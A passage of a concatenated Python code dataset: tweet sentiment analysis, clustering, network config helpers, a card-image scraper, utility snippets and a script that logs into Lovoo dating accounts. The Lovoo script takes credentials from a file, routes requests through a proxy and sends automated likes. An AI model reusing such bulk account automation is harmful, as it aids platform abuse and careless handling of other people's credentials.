1'st March to 7th March\r\n\r\n covidMonthlyList=dailyCovidList.groupby([ pd.Grouper(freq='M')]).sum()\r\n bankMonthlyList = dailyBankList.groupby([pd.Grouper(freq='M')]).sum()\r\n\r\n # covidMonthlyList = dailyCovidList.set_index('Date').resample('M')[\"CovidPOS\", \"CovidNEG\", \"CovidNEU\", \"Total\"].sum()\r\n # bankMonthlyList = dailyCovidList.set_index('Date').resample('M')[\"BankPOS\", \"BankNEG\", \"BankNEU\", \"Total\"].sum()\r\n print(\"Monthly Covid---------------c o v i d---------------------------------------\\n\", covidMonthlyList)\r\n print(\"Monthly Bank----------------b a n k--------------------------------------\\n\", bankMonthlyList)\r\n\r\n # totalTweets categorised based on month PLOT\r\n\r\n totalMonthlyList = []\r\n for i in range(len(covidMonthlyList)):\r\n print(\"total covid monthly: \",covidMonthlyList['Total'][i] ,\"total bank monthly: \", bankMonthlyList['Total'][i])\r\n totalMonthlyList.append(covidMonthlyList['Total'][i] + bankMonthlyList['Total'][i])\r\n\r\n colors = [\"#00695C\", \"#00897B\"]\r\n data_2weeks = [[\"February\", \"February\", \"March\", \"March\", \"April\", \"April\", \"May\", \"May\"],\r\n [\"Covid-19\", \"Bank\", \"Covid-19\", \"Bank\", \"Covid-19\", \"Bank\", \"Covid-19\", \"Bank\"],\r\n [round(covidMonthlyList['Total'][0] / totalMonthlyList[0] * 100),round( bankMonthlyList['Total'][0] / totalMonthlyList[0] * 100),\r\n round(covidMonthlyList['Total'][1] / totalMonthlyList[1] * 100), round(bankMonthlyList['Total'][1] / totalMonthlyList[1] * 100),\r\n round(covidMonthlyList['Total'][2] / totalMonthlyList[2] * 100), round(bankMonthlyList['Total'][2] / totalMonthlyList[2] * 100),\r\n round(covidMonthlyList['Total'][3] / totalMonthlyList[3] * 100), round(bankMonthlyList['Total'][3] / totalMonthlyList[3] * 100),\r\n ]\r\n ]\r\n print(\"data 2 weeks::: \", data_2weeks)\r\n rows_2Weeks = zip(data_2weeks[0], data_2weeks[1], data_2weeks[2])\r\n headers_2Weeks = ['Monthly Comparison', 'Tweet', 'Value']\r\n WeekDF_2Weeks = pd.DataFrame(rows_2Weeks, columns=headers_2Weeks)\r\n pivot_df_2Weeks = WeekDF_2Weeks.pivot(index='Monthly Comparison', columns='Tweet', values='Value')\r\n # Note: .loc[:,['Positive','Negative', 'Neutral']] is used here to rearrange the layer ordering\r\n pivot_df_2Weeks.loc[:, [\"Covid-19\", \"Bank\", ]].plot.bar(stacked=True, color=colors, figsize=(5, 7))\r\n plt.show()\r\n\r\n # PLOT A STACKED BAR CHART per month ------COVID vs BANKING\r\n\r\n # PLOT COVID VS BANKING TWEETS\r\n # PlotLine-- total monthly tweets (Covid vs banking)\r\n X_Base = [1, 2, 3, 4]\r\n plt.plot(X_Base, covidMonthlyList['Total'], label=\"Covid tweets\")\r\n plt.plot(X_Base, bankMonthlyList['Total'], label=\"Banking tweets\")\r\n plt.ylabel(\"Tweets\")\r\n plt.xlabel(\"Month\")\r\n plt.legend()\r\n plt.show()\r\n\r\n # PLOT A STACKED BAR CHART for all months ------Total COVID vs BANKING\r\n\r\n # endFunction\r\n\r\n\r\ndef VisualiseTweets(tweetList):\r\n tweetWords = \"\"\r\n allTokens = \"\"\r\n stopwords = STOPWORDS\r\n garbageTerms2 = ['', \"http\", \"want\", \"need\", \"' \", '’ ', \"us\", \"hi\", \"hey\", \"find\", \"due\", \"look\", \"set\", \"thats\",\r\n \"sure\", \"hsbc\", 'good', 'dont',\r\n \"https\", \"open\", \"hello\", \"404\", \"nt\", \"able\", '.', 'hi', 'i', 'isa', \"get\", \"know\", '.', 'dm',\r\n 'via', 'iâ\x80\x99ve', 'got',\r\n \"http\", \"want\", \"need\", \"' \", '’ ', \"us\", \"please\", \"nt\", \"able\", 'nick', \"covid\", \"covid-19\",\r\n 'the', 'if', 'yuriy', 'tijianne', 'name',\r\n \"get\", \"know\", \"coronavirus\", \"virus\", 
'ank', 'im', '22', 'see', 'alison', 'give', 'mill', 'see',\r\n 'via', 'sam', 'full', '03457', \"thank\", \"hsbcuk\", \"one\", \"still\", \"app\", \"day\", \"go\", \"hear\",\r\n \"week\", \"take\", \"make\", \"use\", \"click\", \"even\", \"new\", \"cent\"]\r\n for val in tweetList:\r\n\r\n # typecaste each val to string\r\n val = str(val)\r\n if val != 'tweetnotfound':\r\n # split the value\r\n tokens = val.split()\r\n tweetText = \"\"\r\n # Converts each token into lowercase\r\n for i in range(len(tokens)):\r\n tokens[i] = tokens[i].lower()\r\n if tokens[i] not in garbageTerms2 and tokens[i] not in stopwords:\r\n allTokens += tokens[i].lower() + \" \"\r\n else:\r\n tokens[i] = ''\r\n\r\n tweetWords += \"\".join(str(tokens)) + \"\"\r\n text_list = allTokens.split(\" \")\r\n\r\n print(\"\\n\\nTWEETWORDS - - -- \\n\", tweetWords)\r\n freq = nltk.FreqDist(text_list)\r\n print(freq)\r\n top_freq = freq.most_common(30)\r\n print(top_freq)\r\n freq.plot(30, cumulative=False)\r\n\r\n plt.show()\r\n\r\n CreateWordCloud(allTokens)\r\n\r\n\r\n# print(df)\r\n\r\n# print(word_count_dict)\r\n\r\n# word_count_head=Counter(data for data in clean_data.head())\r\n\r\n#######################################START ###################\r\n\r\nimport re\r\n\r\n\r\n# removing @names\r\ndef remove_pattern(text, pattern_regex):\r\n r = re.findall(pattern_regex, str(text))\r\n for i in r:\r\n text = re.sub(i, '', str(text))\r\n\r\n return str(text)\r\n\r\n\r\nimport numpy as np\r\n\r\n# We are keeping cleaned tweets in a new column called 'tidy_tweets' for removing names who tweeted\r\ndata['tidy_tweets'] = np.vectorize(remove_pattern)(data['TWEET'], \"@[\\w]*: | *RT*\")\r\n# data['tidy_tweets']=data['TWEET']\r\n# remove links\r\ncleaned_tweets = []\r\n\r\nfor index, row in data.iterrows():\r\n # Here we are filtering out all the words that contains link\r\n words_without_links = [word for word in row.tidy_tweets.split() if 'http' not in word]\r\n cleaned_tweets.append(' '.join(words_without_links))\r\n\r\ndata['tidy_tweets'] = cleaned_tweets\r\n\r\n# deleting duplicate rows\r\ndata.drop_duplicates(subset=['tidy_tweets'], keep=False)\r\n\r\n# removing punctuations\r\npunctuations = string.punctuation\r\ngarbage = [\"'\", '[', ']', \".\", \",\", '<', '!', '&', '(', ')']\r\n# data['absolute_tidy_tweets'] = data['tidy_tweets'].str.replace(\"[^a-zA-Z# ]\", \"\")\r\ndata['absolute_tidy_tweets'] = data['tidy_tweets'].apply(\r\n lambda x: ''.join([i for i in x if i not in punctuations and i not in garbage]))\r\n\r\n# # #removing punctuation\r\n# punctuations=string.punctuation\r\n# # #not removing hyphen; incase considering time period\r\n# punctuations.replace(\"-\",'')\r\n# pattern= r\"[{}]\".format(punctuations)\r\n# words_punc_removed=[]\r\n# for w in words_in_tweets:\r\n# words_punc_removed.append(re.sub(pattern,\"\",w))\r\n\r\n# removing stopwords is,am,are\r\nstopwordsSet = set(stopwords.words(\"english\"))\r\ngarbageTerms2 = ['', \"http\", \"want\", \"need\", \"' \", '’ ', \"us\", \"hi\", \"hey\", \"find\", \"need\", \"due\", \"look\",\r\n \"including\", \"https\", \"open\", \"times\", \"hello\", \"404\", \"nt\", \"able\", '.', 'hi', \"get\", \"know\", '.',\r\n \"http\", \"want\", \"need\", \"' \", '’ ', \"us\", \"please\", \"hi\", \"hey\", \"find\", \"need\", \"due\", \"look\",\r\n \"including\", \"https\", \"open\", \"apply\", \"times\", \"hours\", \"time\", \"hello\", \"404\", \"nt\", \"able\", \"covid\",\r\n \"covid-19\", 'thats', '0800',\r\n \"get\", \"know\", \"coronavirus\", \"virus\", \"oh\", 'yuriy', 
'tijianne', 'name', 'well', \"set\", \"thats\"]\r\n\r\ncleaned_tweets = []\r\n\r\nfor index, row in data.iterrows():\r\n # filtering out all the stopwords\r\n words_without_stopword1 = [word for word in row.absolute_tidy_tweets.split() if not word in stopwordsSet]\r\n words_without_stopwords = [word for word in words_without_stopword1 if not word in garbageTerms2]\r\n\r\n # finally rebuild each tweet from the words that survived filtering\r\n cleaned_tweets.append(' '.join(words_without_stopwords))\r\n\r\ndata['absolute_tidy_tweets'] = cleaned_tweets\r\n# tokenization - dividing sentences into tokens; lemmatization - reducing each word to its lemma\r\n\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\n# Tokenization\r\ntokenized_tweet = data['absolute_tidy_tweets'].apply(lambda x: x.split())\r\n# Finding Lemma for each word\r\nword_lemmatizer = WordNetLemmatizer()\r\ntokenized_tweet = tokenized_tweet.apply(lambda x: [word_lemmatizer.lemmatize(i) for i in x])\r\n# joining words into sentences (from where they came from)\r\nfor i, tokens in enumerate(tokenized_tweet):\r\n tokenized_tweet[i] = ' '.join(tokens)\r\n\r\n# data.to_csv(\"Fulltweets.csv\")\r\ndata['absolute_tidy_tweets'] = tokenized_tweet\r\nprint(data)\r\ntweetsList = data['absolute_tidy_tweets']\r\nprint(\"\\n - - - - printing absolute tidy tweets: \\n \\n \", tweetsList)\r\n\r\n###########################################\r\n\r\ncovidDF = FilterCovidTweets(data)\r\nprint(covidDF)\r\nbankDF = FilterBankTweets(data)\r\nGetTweetSentiment(tweetsList, data)\r\nindex = 0\r\ncounter = 0\r\ncovidTweetsFull = []\r\nsizeCovidDF = len(covidDF['DATE'])\r\nfor i in range(len(data['DATE'])):\r\n if index < sizeCovidDF and data['DATE'][i] == covidDF['DATE'][index]:\r\n # print(\"date is: \", data['DATE'][i], \" and matched: \", covidDF['DATE'][index], \" and index is : \", index)\r\n covidTweetsFull.append(covidDF['TWEET'][index])\r\n index += 1\r\n else:\r\n covidTweetsFull.append(\"tweetnotfound\")\r\n counter += 1\r\n\r\nindex = 0\r\ncounter = 0\r\nbankTweetsFull = []\r\nsizeBankDF = len(bankDF['DATE'])\r\nfor i in range(len(data['DATE'])):\r\n if index < sizeBankDF and data['DATE'][i] == bankDF['DATE'][index]:\r\n # print(\"date is: \", data['DATE'][i], \" and matched: \", bankDF['DATE'][index], \" and index is : \", index)\r\n bankTweetsFull.append(bankDF['TWEET'][index])\r\n index += 1\r\n else:\r\n bankTweetsFull.append(\"tweetnotfound\")\r\n counter += 1\r\n\r\nnewcovidDF = pd.DataFrame(list(zip(covidTweetsFull, data['DATE'])), columns=['TWEET', 'DATE'])\r\nnewbankDF = pd.DataFrame(list(zip(bankTweetsFull, data['DATE'])), columns=['TWEET', 'DATE'])\r\n\r\nCompareSentiments(newcovidDF, newbankDF)\r\n# count_bank_tweets=len(bankTweets)\r\n# count_covid_tweets=len(covidTweets)\r\n# print(\"#bankTweets: \",count_bank_tweets,\" #covidTweets: \",count_covid_tweets)\r\n# VisualiseTweets(newcovidDF['TWEET'])\r\n# VisualiseTweets(newbankDF['TWEET'])\r\n# CreateWordCloud(newcovidDF['TWEET'])\r\n# CreateWordCloud(newbankDF['TWEET'])\r\n","sub_path":"HSBC_UK_Sentiment_Analysis2.py","file_name":"HSBC_UK_Sentiment_Analysis2.py","file_ext":"py","file_size_in_byte":20089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"647705881","text":"from utils import min_dist, dist\nfrom find_neighbors import find_neighbors\nfrom update_cluster import updateCluster\nfrom find_overlap import find_overlap\nfrom merge_clusters import merge_clusters\nfrom new_cluster import newCluster\n\n\nclass SOStream:\n\n def 
__init__(self, alpha = 0.1, min_pts = 10, merge_threshold = 27000):\n self.alpha = alpha\n self.min_pts = min_pts\n self.M = [[]]\n self.merge_threshold = merge_threshold\n\n def process(self, vt):\n winner_micro_cluster = min_dist(vt, self.M[-1])\n new_M = self.M[-1].copy()\n if len(new_M) >= self.min_pts:\n winner_neighborhood = find_neighbors(winner_micro_cluster, self.min_pts, new_M)\n if dist(vt, winner_micro_cluster.centroid) < winner_micro_cluster.radius:\n updateCluster(winner_micro_cluster, vt, self.alpha, winner_neighborhood)\n else:\n new_M.append(newCluster(vt))\n overlap = find_overlap(winner_micro_cluster, winner_neighborhood)\n if len(overlap) > 0:\n merged_cluster, deleted_clusters = merge_clusters(winner_micro_cluster, overlap, self.merge_threshold)\n for deleted_cluster in deleted_clusters:\n new_M.remove(deleted_cluster)\n if merged_cluster is not None:\n new_M.append(merged_cluster)\n else:\n new_M.append(newCluster(vt))\n self.M.append(new_M)\n pass\n","sub_path":"src/sostream.py","file_name":"sostream.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"542894814","text":"\"\"\"igvm - Network Utilities\n\nCopyright (c) 2018, InnoGames GmbH\n\"\"\"\n\nimport logging\n\nfrom adminapi.dataset import Query\nfrom adminapi.filters import Contains, Not\n\nlog = logging.getLogger(__name__)\n\n\ndef get_network_config(server):\n ret = {}\n # It is impossible to use server['route_network']\n # if IP address of a server was changed via --newip.\n route_network = Query({\n 'servertype': 'route_network',\n 'state': Not('retired'),\n 'intern_ip': Contains(server['intern_ip']),\n }, [\n 'hostname',\n 'intern_ip',\n 'default_gateway',\n 'internal_gateway',\n 'primary_ip6',\n 'vlan_tag',\n ]).get()\n\n default_gateway_route, internal_gateway_route = get_gateways(route_network)\n\n # For server installation internal gateway is the default and the only one\n if server.get('intern_ip'):\n ret['ipv4_address'] = server['intern_ip']\n ret['ipv4_netmask'] = route_network['intern_ip'].prefixlen\n ret['ipv4_default_gw'] = internal_gateway_route.get('intern_ip', None)\n\n if server.get('primary_ip6'):\n ret['ipv6_address'] = server['primary_ip6']\n ret['ipv6_netmask'] = route_network['primary_ip6'].prefixlen\n ret['ipv6_default_gw'] = internal_gateway_route.get(\n 'primary_ip6', None\n )\n\n ret['vlan_tag'] = route_network['vlan_tag']\n ret['vlan_name'] = route_network['hostname']\n\n return ret\n\n\ndef get_gateways(network):\n \"\"\" Get default and internal gateway Serveradmin objects\n for given network. 
If they are not defined, return\n empty dictionaries to simulate Serveradmin objects.\n \"\"\"\n\n if network.get('default_gateway'):\n default_gateway = Query({\n 'state': Not('retired'),\n 'hostname': network['default_gateway'],\n }).get()\n else:\n default_gateway = {}\n\n if network.get('internal_gateway'):\n internal_gateway = Query({\n 'state': Not('retired'),\n 'hostname': network['internal_gateway'],\n }).get()\n else:\n internal_gateway = {}\n\n return default_gateway, internal_gateway\n","sub_path":"igvm/utils/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"397897423","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# Description:\n# Goal: crawl the card images from the card manager on the official Hearthstone site and save them by category\n# Input: none\n# Output: image files saved by category\n#\n# Core problem: handling the JS effects on the page and downloading the images\n# Possible improvement: show crawl progress\n# Tech stack: requests, bs, re, selenium browser automation\n# Program structure:\n# step1: class HearthStone(): holds the global state and reports progress\n# step2: hearthStoneSpider: starts the automated browser and triggers the JS effects\n# closeGuide\n# step3: getPicList: parses the page with BeautifulSoup and collects the image URLs\n# step4: savePic: downloads and saves the images with requests, showing progress\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport traceback\nimport time\nimport os\n\n\nclass HearthStone():\n # holds the global state\n def __init__(self):\n # configure and start the automated browser\n # options = Options()\n # options.add_argument('--headless')\n # options.add_argument('--disable-gpu')\n # self.driver = webdriver.Chrome(chrome_options=options)\n\n self.driver = webdriver.Chrome()\n # record the start time\n self.time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n # total number of images to crawl\n self.end = 1\n # number of images already downloaded\n self.start = 0\n\n def hearthStoneSpider(self):\n # open the start page\n self.driver.get('https://hs.blizzard.cn/cards/')\n\n # close the guide overlay\n firstBtn = self.driver.find_element_by_class_name(\"closeGuide\")\n # the guide page can misbehave: the tab (official Hearthstone app) overlaps, so the window may need to be moved?\n self.driver.maximize_window()\n # hover, then click\n ActionChains(self.driver).move_to_element(firstBtn).perform()\n time.sleep(1)\n ActionChains(self.driver).click(firstBtn).perform()\n time.sleep(1)\n\n # switch to the Wild view\n # changeBtn=self.driver.find_element_by_class_name(\"mode_icon mode_standard\") #class name does not work\n changeBtn = self.driver.find_element_by_xpath(\n '/html/body/div[3]/div/div[2]/div/div[1]/div/div[3]/div[2]/div[1]/div[2]/div[2]/ul/li[1]/a/span')\n ActionChains(self.driver).move_to_element(changeBtn).perform()\n time.sleep(1)\n ActionChains(self.driver).click(changeBtn).perform()\n time.sleep(1)\n # xpath works for the trigger button and the sticker-style menu items\n wildBtn = self.driver.find_element_by_xpath(\n '/html/body/div[3]/div/div[2]/div/div[1]/div/div[3]/div[2]/div[1]/div[2]/div[2]/ul/li[1]/a/ul/li[2]')\n ActionChains(self.driver).move_to_element(wildBtn).perform()\n time.sleep(1)\n ActionChains(self.driver).click(wildBtn).perform()\n time.sleep(1)\n\n # cycle through the nine classes\n for i in range(9):\n try:\n xPath = '/html/body/div[3]/div/div[2]/div/div[1]/div/div[3]/div[2]/div[1]/ul/li[' + str(i + 1) + ']/a'\n heroBtn = self.driver.find_element_by_xpath(xPath)\n ActionChains(self.driver).move_to_element(heroBtn).perform()\n time.sleep(1)\n ActionChains(self.driver).click(heroBtn).perform()\n time.sleep(1)\n\n # keep clicking while the next-page button is visible\n while True:\n # get the next-page button\n # nextBtn=self.driver.find_element_by_name(\"cards_next\")\n nextBtn = self.driver.find_element_by_css_selector('a[class=\"cards_next\"]')\n # break out once next-page is hidden, by matching the marker directly in the page source\n if self.driver.page_source.find(\n 'class=\"cards_next\" href=\"javascript:void(0);\" style=\"display: none;\"') != -1:\n break\n # hover, then click next page\n # ActionChains(self.driver).move_to_element(nextBtn).perform()\n # time.sleep(1)\n ActionChains(self.driver).click(nextBtn).perform()\n # time.sleep(1)\n lst = self.getPicList(self.driver.page_source)\n self.end = len(lst) * 9\n self.savePic(lst)\n except:\n # the try/except only guards this loop\n #traceback.print_exc() # prints the error details\n continue\n\n def getPicList(self, html):\n # create a new list\n lst = []\n soup = bs(html, 'lxml')\n # collect the image links into the list\n # srcs=soup.find_all('img',{'class':'imgload'})\n # srcs = soup.select('img[class=\"imgload\"]')\n srcs = soup.select('.card_img')\n # print(type(srcs))\n # print(srcs)\n for i in range(len(srcs)):\n src = srcs[i]\n lst.append(src.attrs['src'])\n return lst\n\n def savePic(self, lst):\n for i in range(len(lst)):\n # derive the file name and target path\n name = lst[i].split('/')[-1]\n # print(name)\n fname = name.split('_')[2] + '_' + name.split('_')[3] + '_' + name.split('_')[5] # name.split('_') is a list\n froot = '/home/xiaowu/bear/hearthstone/' + name.split('_')[0] + '/' # absolute path\n fpath = froot + fname\n try:\n if not os.path.exists(froot):\n os.mkdir(froot)\n if not os.path.exists(fpath):\n # send the request and download\n # print(lst[i])\n r = requests.get(lst[i])\n # r.raise_for_status()\n with open(fpath, 'wb') as f:\n f.write(r.content)\n # print progress inside the loop\n self.start += 1\n print('\\rProgress: {:.2f}%'.format(self.start * 100 / self.end), end='') # \\r pulls the cursor back to the start of the line\n except:\n #traceback.print_exc() # prints the error details\n print('Download failed: ' + fname)\n continue\n\n\nif __name__ == '__main__':\n stone = HearthStone()\n print('Start time: ' + stone.time)\n stone.hearthStoneSpider()\n print('\\rCrawl finished: ' + time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n stone.driver.quit()\n print('Automated browser closed!')","sub_path":"10-hearthstonepicspider.py","file_name":"10-hearthstonepicspider.py","file_ext":"py","file_size_in_byte":6512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"332882053","text":"from pathlib import Path\nimport requests\nimport datetime\nimport sys\nimport Proxy\n\n\ndef read_users_info_to_list(path_to_file):\n path = Path(path_to_file)\n if path.is_file():\n try:\n file = open(path, 'r+')\n user_list = [line.rstrip('\\n') for line in file.readlines()]\n if not user_list:\n print(\"List is empty, exit\")\n sys.exit()\n return user_list\n except Exception as error:\n write_to_log('Failed to read', error)\n finally:\n file.close()\n else:\n sys.exit('File not exist ' + path_to_file)\n\n\ndef write_to_log(message='', exception='', exc_info=''):\n info = exc_info\n # 'a' opens an existing file for appending plain text\n log_file = open('log.log', 'a')\n log_file.write('{0} {1} {2}\\n'.format(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), message,\n exception, info))\n log_file.close()\n\n\ndef login(account):\n # Read user info\n try:\n arr = account.split('|')\n if len(arr) >= 2:\n username = arr[0]\n password = arr[1]\n except Exception as error:\n write_to_log(\"Failed to read \" + account, error, sys.exc_info())\n\n # Login\n proxy = Proxy.Proxy()\n proxy = proxy.get_proxy()\n\n url = 'https://de.lovoo.com/login_check'\n session = requests.Session()\n\n try:\n payload = {'_username': username,\n '_password': password,\n '_remember_me': 'false'\n }\n # header = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n # 'Chrome/71.0.3578.98 Safari/537.36'}\n # response = sess.get(url, data=data, headers=header, proxies=proxy)\n response = session.post(url, data=payload, proxies={'http': proxy})\n json = response.json()\n if json['success']:\n print('Successfully logged in')\n return session\n else:\n print(json['message'])\n except Exception as error:\n print(error)\n\n\ndef read_id_without_like(session, page):\n url = 'https://de.lovoo.com/api_web.php/matches/wantyou?resultLimit=15&resultPage=' + str(page)\n\n response = session.get(url)\n json = response.json()\n results = json['response']['result']\n if json['response']['allCount'] == 0:\n print('No result on a page')\n return\n else:\n for el in results:\n # connections GET request: https://de.lovoo.com/api_web.php/users/54a4037ee56da1ea478b4586/connections to\n # get liked status\n r = session.get('https://de.lovoo.com/api_web.php/users/' + el['user']['id'] + '/connections')\n json = r.json()\n if json['response']['hasLiked'] == 0:\n return el['user']['id']\n else:\n print('Try next ID...')\n # propagate the result of the recursive call to the caller\n return read_id_without_like(session, page + 1)\n\n\ndef is_active(session, user_id):\n\n payload = {\"userId\": str(user_id),\n \"vote\": 1,\n \"ref\": \"profile\"}\n\n url = 'https://www.lovoo.com/api_web.php/matches/' + str(user_id) + '?ref=profile&vote=1'\n\n headers = {\n 'accept': 'application/json, text/plain, */*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7,la;q=0.6',\n 'app': 'lovoo',\n 'content-length': '62',\n 'content-type': 'application/json;charset=UTF-8',\n 'origin': 'https://www.lovoo.com',\n 'referer': 'https://www.lovoo.com/list/liked-you',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n }\n\n params = {\n 'ref': 'profile',\n 'vote': '1'\n }\n\n r = session.post(url, data=payload, headers=headers, params=params, )\n\n print(r)\n\n\ndef do_like(account):\n sess = login(account)\n id_without_like = read_id_without_like(sess, 1)\n print(id_without_like)\n is_active(sess, id_without_like)\n\n\n# ###### --- START ---- ###### #\n\naccounts_list = read_users_info_to_list('Test_user.txt')\n\nfor el_account in accounts_list:\n do_like(el_account)\n break\n","sub_path":"requests_2.0.py","file_name":"requests_2.0.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"414235780","text":"import os\nimport shutil\n\ndef PathToList(path, fileOut, tabCount = 0, recursive = True, useTabs = False):\n f = open(fileOut, 'a+')\n for item in os.listdir(path):\n fullItemPath = '%s\\\\%s'%(path, item)\n if os.path.isdir(fullItemPath):\n f.write(fullItemPath + '\\\\\\n')\n if recursive:\n PathToList(path + '\\\\' + item, fileOut, tabCount + 1)\n else:\n if fullItemPath.endswith('.db'):\n os.remove(fullItemPath)\n else:\n f.write(fullItemPath + '\\n')\n f.close()\n\n\nfor fileName in ['galaxy.txt', 'backup.txt']:\n if os.path.exists(fileName):\n os.remove(fileName)\n","sub_path":"sample/python/exploreFolder.py","file_name":"exploreFolder.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"475313348","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/hubspot/contacts/generic_utils.py\n# Compiled at: 2017-11-13 03:36:59\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom inspect import isgenerator\nfrom itertools import islice\nfrom uuid import uuid4 as get_uuid4\nfrom hubspot.contacts.exc import HubspotPropertyValueError\n_EPOCH_DATETIME = datetime(1970, 1, 1)\n_EPOCH_DATE = date.fromordinal(_EPOCH_DATETIME.toordinal())\n\ndef ipaginate(iterable, page_size):\n if not isgenerator(iterable):\n iterable = iter(iterable)\n next_page_iterable = _get_next_page_iterable_as_list(iterable, page_size)\n while next_page_iterable:\n yield next_page_iterable\n next_page_iterable = _get_next_page_iterable_as_list(iterable, page_size)\n\n\ndef _get_next_page_iterable_as_list(iterable, page_size):\n next_page_iterable = list(islice(iterable, page_size))\n return next_page_iterable\n\n\ndef convert_timestamp_in_milliseconds_to_datetime(timestamp_milliseconds):\n timestamp_milliseconds = int(timestamp_milliseconds)\n time_since_epoch = timedelta(milliseconds=timestamp_milliseconds)\n timestamp_as_datetime = _EPOCH_DATETIME + time_since_epoch\n return timestamp_as_datetime\n\n\ndef convert_timestamp_in_milliseconds_to_date(timestamp_milliseconds):\n timestamp_datetime = convert_timestamp_in_milliseconds_to_datetime(timestamp_milliseconds)\n timestamp_date = timestamp_datetime.date()\n return timestamp_date\n\n\ndef paginate(iterable, page_size):\n return list(ipaginate(iterable, page_size))\n\n\ndef convert_date_to_timestamp_in_milliseconds(datetime_or_date):\n timestamp = _convert_datetime_to_timestamp(datetime_or_date)\n date_timestamp_in_milliseconds = int(timestamp * 1000)\n return date_timestamp_in_milliseconds\n\n\ndef _convert_datetime_to_timestamp(datetime_or_date):\n if not isinstance(datetime_or_date, date):\n raise HubspotPropertyValueError(('{!r} is not a date').format(datetime_or_date))\n if isinstance(datetime_or_date, datetime):\n epoch = _EPOCH_DATETIME\n else:\n epoch = _EPOCH_DATE\n time_since_epoch = datetime_or_date - epoch\n timestamp = time_since_epoch.total_seconds()\n return timestamp\n\n\ndef get_uuid4_str():\n uuid4 = get_uuid4()\n return str(uuid4)","sub_path":"pycfiles/hubspot_contacts-1.1.1-py2.7/generic_utils.py","file_name":"generic_utils.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"359184847","text":"# returns a new sorted list from the items in iterable\n# returns a copy, it does not modify the old list\nnums = [6, 1, 5, 3, 2, 8]\nsorted_nums = sorted(nums)\nreverse_sorted = sorted(nums, reverse=True)\n\nprint(\"SORTED\", sorted_nums)\nprint(\"REVERSED\", reverse_sorted)\nprint(nums)\n\n# example\nusers = [\n {\"username\": \"samuel\", \"tweets\": [\"I love cake\", \"I love cats\", \"I love dogs\"]},\n {\"username\": \"katie\", \"tweets\": [\"I love my dogs\"]},\n {\"username\": \"jeff\", \"tweets\": [], \"color\": \"blue\"},\n {\"username\": \"sima\", \"tweets\": [], \"num\": 10, \"color\": \"red\"},\n {\"username\": \"pera\", \"tweets\": [\"Dogs are best\"]},\n {\"username\": \"dzudista\", \"tweets\": []},\n]\n\n# sorts by the size of each dictionary in the list\nsorted_by_size = sorted(users, key=len)\n\n# sorts by username\nsorted_by_username = sorted(users, key=lambda user: user['username'])\nprint(sorted_by_username)\n\n# sorts by who has the most tweets\nmost_active_user = sorted(users, key=lambda user: len(user[\"tweets\"]))\nprint(\"MOST:\", most_active_user)\n\n# example\nsongs = [\n {\"title\": \"happy birthday\", \"playcount\": 1},\n {\"title\": \"Survice\", \"playcount\": 6},\n {\"title\": \"YMNCA\", \"playcount\": 99},\n {\"title\": \"Toxic\", \"playcount\": 31},\n]\n\n# sort by song['playcount']\nsort_by_playcount = sorted(songs, key=lambda song: song['playcount'])\nprint(sort_by_playcount)\n","sub_path":"8. sorted.py","file_name":"8. sorted.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"118355242","text":"from traceback import print_tb\n\nfrom flask import jsonify\n\nfrom app.api import bp\nfrom app.models import Resource, Language\n\n\n@bp.route('/resources', methods=['GET'])\ndef resources():\n return get_resources()\n\n\n@bp.route('/languages', methods=['GET'])\ndef languages():\n return get_languages()\n\n\ndef get_resources():\n resources = {}\n try:\n resources = Resource.query.all()\n\n except Exception as e:\n print_tb(e.__traceback__)\n print(e)\n\n finally:\n return jsonify([single_resource.serialize for single_resource in resources])\n\n\ndef get_languages():\n languages = {}\n\n try:\n languages = Language.query.all()\n\n except Exception as e:\n print_tb(e.__traceback__)\n print(e)\n\n finally:\n return jsonify([language.name for language in languages])\n","sub_path":"app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
